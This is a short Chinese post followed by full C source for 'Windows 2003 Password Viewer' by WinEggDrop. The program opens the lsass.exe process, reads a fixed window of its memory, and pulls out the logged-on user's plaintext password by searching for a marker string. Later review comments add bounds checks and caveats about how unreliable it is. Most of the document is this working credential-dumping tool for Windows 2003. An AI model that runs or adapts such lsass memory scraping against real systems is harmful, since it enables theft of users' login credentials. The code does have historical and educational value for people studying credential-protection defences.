XP 和 2003 的 lsass 进程中的明文密码


用 WinHex 读取 XP 和 2003 下 lsass.exe 进程的内存数据，可以在其中找到当前登录用户的明文密码。下面的程序把这一搜索自动化，但只允许在 Windows 2003（版本 5.2）上运行，且需要有读取 lsass.exe 内存的权限（OpenProcess 失败时直接退出）；正如代码注释所说，它依赖固定地址和特征字符串，结果并不可靠。

source code:

//********************************************************************************
// Version: V1.0
// Coder: WinEggDrop
// Date Release: 12/15/2004
// Purpose: To Demonstrate Searching Logon User Password On 2003 Box,The Method
//          Used Is Pretty Unwise,But This May Be The Only Way To Review The
//          Logon User's Password On Windows 2003.
// Test PlatForm: Windows 2003
// Compiled On: VC++ 6.0
//********************************************************************************
#include <stdio.h>
#include <windows.h>
#include <tlhelp32.h>

#define BaseAddress 0x002b5000        // Start Of The 5 KB Window Of lsass.exe Memory Read By FindPassword(). The Password May Lie Before This Address Or Well Beyond It, So A Miss Is Common.
                                      // NOTE(review): A Hard-Coded Address Is Tied To One lsass Build/Memory Layout And Is Never Validated; Treat Any Hit As A Candidate Only.
char  Password[MAX_PATH] = {0};        // Filled By Search() With The Candidate Password (Narrow Chars, NUL-Terminated) And Printed By FindPassword()

// Function ProtoType Declaration
//------------------------------------------------------------------------------------------------------
BOOL  FindPassword(DWORD PID);                 // Open lsass.exe, Read One Window At BaseAddress, Run Search(), Print The Result
int   Search(char *Buffer,const UINT nSize);   // Scan A Memory Window For The Magic String + Marker; Fills The Global Password[]
DWORD GetLsassPID();                           // Toolhelp Snapshot Walk; Returns 0 When lsass.exe Is Not Found Or The Snapshot Fails
BOOL  Is2003();                                // TRUE Only When GetVersionEx Reports Version 5.2
//------------------------------------------------------------------------------------------------------
// End Of Function ProtoType Declaration

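//------------------------------------------------------------------------------------
// Purpose: Entry Point. Gate On The OS Version, Locate lsass.exe, Then Search Its Memory.
// Return Type: int
// Returns: 0 When lsass.exe Could Be Opened And Read (Whether Or Not A Password Was
//          Found), -1 On Wrong OS Version, Missing lsass.exe, Or A Failed Open/Read.
// Review Fixes: The Version-Gate Message Read "Can't Only Run", Which Says The
//          Opposite Of What Is Meant; FindPassword()'s Result Is No Longer Ignored.
//------------------------------------------------------------------------------------
int main()
{
    DWORD PID = 0;
    printf("Windows 2003 Password Viewer V1.0 By WinEggDrop\n\n");

    if (!Is2003())        // Is2003() Accepts Version 5.2 Only
    {
        printf("The Program Can Only Run On Windows 2003 Platform\n");
        return -1;
    }

    PID = GetLsassPID();        // Get The Lsass.exe PID

    // GetLsassPID() Prints Its Own Message When The Snapshot Fails; A Missing
    // Process Or A Failed Process32First() Is Silent, So Nothing More To Say Here.
    if (PID == 0)
    {
        return -1;
    }

    // FindPassword() Returns FALSE Only When lsass.exe Cannot Be Opened Or Read;
    // Surface That In The Exit Status Instead Of Always Returning 0.
    return FindPassword(PID) ? 0 : -1;
}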
// End main()

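//------------------------------------------------------------------------------------
// Purpose: Report Whether Buffer[Pos..Pos+6] Is The Marker That Precedes The Password:
//          A 0x02 Byte Followed By Six Zero Bytes.
// Return Type: int (1 = Marker Present, 0 = Absent Or Fewer Than 7 Bytes Left)
// Parameters:
//           In: const char *Buffer --> The Memory Buffer Being Searched
//           In: const UINT nSize   --> The Size Of The Memory Buffer
//           In: const UINT Pos     --> Candidate Offset Of The Marker
//------------------------------------------------------------------------------------
static int IsPasswordMarker(const char *Buffer,const UINT nSize,const UINT Pos)
{
    UINT k = 0;

    if (Pos + 7 > nSize)        // The Marker Needs 7 Bytes; Never Read Past The Buffer
    {
        return 0;
    }
    if (Buffer[Pos] != 0x02)
    {
        return 0;
    }
    for (k = 1 ; k < 7 ; k++)
    {
        if (Buffer[Pos + k] != 0)
        {
            return 0;
        }
    }
    return 1;
}
// End IsPasswordMarker

//------------------------------------------------------------------------------------
// Purpose: Search The Memory & Try To Get The Password
// Return Type: int
// Parameters:
//           In: char *Buffer        --> The Memory Buffer To Search
//           In: const UINT nSize   --> The Size Of The Memory Buffer
// Returns: Offset Of The First Password Byte Inside Buffer (The Candidate Itself Is
//          Copied Into The Global Password[]), Or -1 When Nothing Was Found.
// Note: The Program Tries To Locate The Magic String "LocalSystem Remote Procedure Call",
//       Since The Password Is Near The Above Location, But It's Not Always True That
//       We Will Find The Magic String, Or Even If We Find It, The Password May Be Located
//       Somewhere Else. We Only Look For Luck.
// Review Fixes Vs. The Original:
//   * Every Word Compare And The Marker Test Are Bounds-Checked Against nSize (The
//     Original Read Up To strlen("LocalSystem") Bytes, And 6 Bytes, Past The End Of
//     Buffer When A Candidate Sat Near Its Tail);
//   * The Copy Into Password[] Stops At sizeof(Password)-1, So A Long Run Of Printable
//     Bytes After The Marker Can No Longer Overflow The Global (Buffer Is 5 KB, Password
//     Is MAX_PATH) And The Terminating NUL Is Preserved.
//------------------------------------------------------------------------------------
int Search(char *Buffer,const UINT nSize)
{
    // The Words Are Separated By NUL Bytes In Memory, So strstr() Cannot Match The
    // Whole Phrase; Match One Word At A Time And Hop Over Each Terminator.
    static const char *const Words[] = {"LocalSystem","Remote","Procedure","Call"};
    const UINT nWords = sizeof(Words) / sizeof(Words[0]);
    UINT i = 0;
    UINT j = 0;
    UINT Count = 0;

    if (Buffer == NULL)
    {
        return -1;
    }

    // Step 1: Find The Magic String. On Exit i Is The Offset Of "Call" (As In The
    // Original), Or nSize When The String Is Not Inside This Window.
    for (i = 0 ; i < nSize ; i++)
    {
        UINT OffSet = 0;
        UINT w = 0;

        if (Buffer[i] != 'L')
        {
            continue;
        }
        for (w = 0 ; w < nWords ; w++)
        {
            const UINT Len = (UINT)strlen(Words[w]);

            if (i + OffSet + Len > nSize)        // The Word Would Run Past The Buffer
            {
                break;
            }
            if (strnicmp(&Buffer[i + OffSet],Words[w],Len) != 0)
            {
                break;
            }
            if (w + 1 < nWords)                  // Skip The Word And Its NUL Separator
            {
                OffSet += Len + 1;
            }
        }
        if (w == nWords)
        {
            i += OffSet;
            break;
        }
    }

    if (i >= nSize)
    {
        return -1;        // Magic String Not Found; This Is The Common Outcome
    }

    // Step 2: From The Magic String Onward, Look For The Marker And Copy The
    // UTF-16LE String That Follows It, Keeping The Low Byte Of Each Code Unit.
    ZeroMemory(Password,sizeof(Password));
    for (; i < nSize ; i++)
    {
        if (!IsPasswordMarker(Buffer,nSize,i))
        {
            continue;
        }
        for (j = i + 7 ; j < nSize ; j += 2)
        {
            // A Zero Byte Ends The String. A Byte With The High Bit Set Is Negative
            // Here (char Is Signed By Default On MSVC) And Also Ends The Copy, So
            // Non-ASCII Passwords Are Truncated -- Unchanged From The Original.
            if (Buffer[j] <= 0)
            {
                break;
            }
            if (Count >= sizeof(Password) - 1)        // Leave Room For The NUL
            {
                break;
            }
            Password[Count++] = Buffer[j];
        }
        return (int)(i + 7);        // Offset Of The First Password Byte
    }
    return -1;        // No Marker After The Magic String
}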
// End Search

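//------------------------------------------------------------------------------------
// Purpose: To Get The Lsass.exe PID
// Return Type: DWORD
// Parameters:  None
// Returns: PID Of The First Process Whose Image Name Equals "Lsass.EXE" (Case-Insensitive)
//          In A Toolhelp Snapshot, Or 0 When The Snapshot Cannot Be Taken Or Walked, Or
//          No Such Process Exists.
// Review Notes: The Unused hProcess Local Was Dropped. The Match Is By Image Name Only
//          And Takes The First Hit In Snapshot Order -- No Other Identity Check Is Made.
//          A Process32First() Failure Still Returns 0 Silently, As In The Original.
//------------------------------------------------------------------------------------
DWORD GetLsassPID()
{
    HANDLE hProcessSnap = INVALID_HANDLE_VALUE;
    PROCESSENTRY32 pe32;
    DWORD PID = 0;

    hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (hProcessSnap == INVALID_HANDLE_VALUE)
    {
        printf("Fail To Create Snap Shot\n");
        return 0;
    }

    pe32.dwSize = sizeof(PROCESSENTRY32);        // Must Be Set Before Process32First()

    if (!Process32First(hProcessSnap, &pe32))
    {
        CloseHandle(hProcessSnap);        // Must Clean Up The Snapshot Object!
        return 0;
    }

    do
    {
        if (strcmpi(pe32.szExeFile,"Lsass.EXE") == 0)
        {
            PID = pe32.th32ProcessID;
            break;
        }
    } while (Process32Next(hProcessSnap, &pe32));

    CloseHandle(hProcessSnap);
    return PID;
}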
// End GetLsassPID()

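//------------------------------------------------------------------------------------
// Purpose: To Find The Password
// Return Type: BOOLEAN
// Parameters:
//           In: DWORD PID        ->        The Lsass.exe's PID
// Returns: FALSE When lsass.exe Cannot Be Opened Or Its Memory Cannot Be Read; TRUE
//          Otherwise, Even When No Password Was Found (A Message Is Printed Instead).
// Side Effects: Prints The Candidate; On Return Both The Local Memory Copy And The
//          Global Password[] Are Zeroed (main() Does Not Read Password Afterwards).
// Review Fixes: The Read Length Is sizeof(Buffer) Instead Of A Repeated Literal, And
//          The Credential Material Is Scrubbed Before Returning.
//------------------------------------------------------------------------------------
BOOL FindPassword(DWORD PID)
{
    HANDLE hProcess = NULL;
    char   Buffer[5 * 1024] = {0};        // One Window Of lsass.exe Memory, Read At BaseAddress
    DWORD  ByteGet = 0;
    int    Found = -1;

    // PROCESS_VM_READ On lsass.exe Is Typically Only Granted To A Privileged Caller;
    // The Program Does Not Enable SeDebugPrivilege Itself, So A Failure Here Usually
    // Means Insufficient Rights.
    hProcess = OpenProcess(PROCESS_VM_READ,FALSE,PID);        // Open Process
    if (hProcess == NULL)
    {
        printf("Fail To Open Process\n");
        return FALSE;
    }

    // ByteGet May Be Smaller Than The Request; Only Those Bytes Are Searched Below.
    if (!ReadProcessMemory(hProcess,(PVOID)BaseAddress,Buffer,sizeof(Buffer),&ByteGet))
    {
        printf("Fail To Read Memory\n");
        CloseHandle(hProcess);
        return FALSE;
    }

    CloseHandle(hProcess);

    Found = Search(Buffer,ByteGet);        // Search The Password
    if (Found >= 0)        // We May Find The Password
    {
        if (strlen(Password) > 0)        // A Hit, Though We Don't Know If It Is Correct
        {
            printf("Found Password At #0x%x -> \"%s\"\n",Found + BaseAddress,Password);
        }
    }
    else
    {
        printf("Fail To Find The Password\n");
    }

    // Scrub The Copy Of lsass Memory And The Extracted Credential. A Plain memset On
    // A Dying Local May Be Elided By An Optimiser; Prefer SecureZeroMemory Where The
    // SDK Provides It.
    memset(Buffer,0,sizeof(Buffer));
    memset(Password,0,sizeof(Password));
    return TRUE;
}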
// End FindPassword

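//------------------------------------------------------------------------------------
// Purpose: Check If The Box Is Windows 2003
// Return Type: BOOLEAN
// Parameters:  None
// Returns: TRUE When GetVersionEx Reports Version 5.2, FALSE Otherwise Or When The
//          Version Cannot Be Obtained At All.
// Review Fix: The Original Resized The Structure After A Failed GetVersionEx But Never
//          Called It Again, So On That Path It Compared A Zeroed Version And Always
//          Returned FALSE. The Retry Is Now Actually Performed.
// Note: 5.2 Is Also What Windows XP x64 Reports; No Product-Type Check Is Made.
//------------------------------------------------------------------------------------
BOOL Is2003()
{
    OSVERSIONINFOEX osvi;
    BOOL bGotVersion;
    ZeroMemory(&osvi,sizeof(OSVERSIONINFOEX));
    osvi.dwOSVersionInfoSize=sizeof(OSVERSIONINFOEX);

    bGotVersion = GetVersionEx((OSVERSIONINFO *)&osvi);
    if (!bGotVersion)
    {
        // Platforms That Reject The EX Structure Accept The Basic One.
        osvi.dwOSVersionInfoSize=sizeof(OSVERSIONINFO);
        bGotVersion = GetVersionEx((OSVERSIONINFO *)&osvi);
    }
    return (bGotVersion && osvi.dwMajorVersion == 5 && osvi.dwMinorVersion == 2);
}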
// End Is2003()
// End Of File
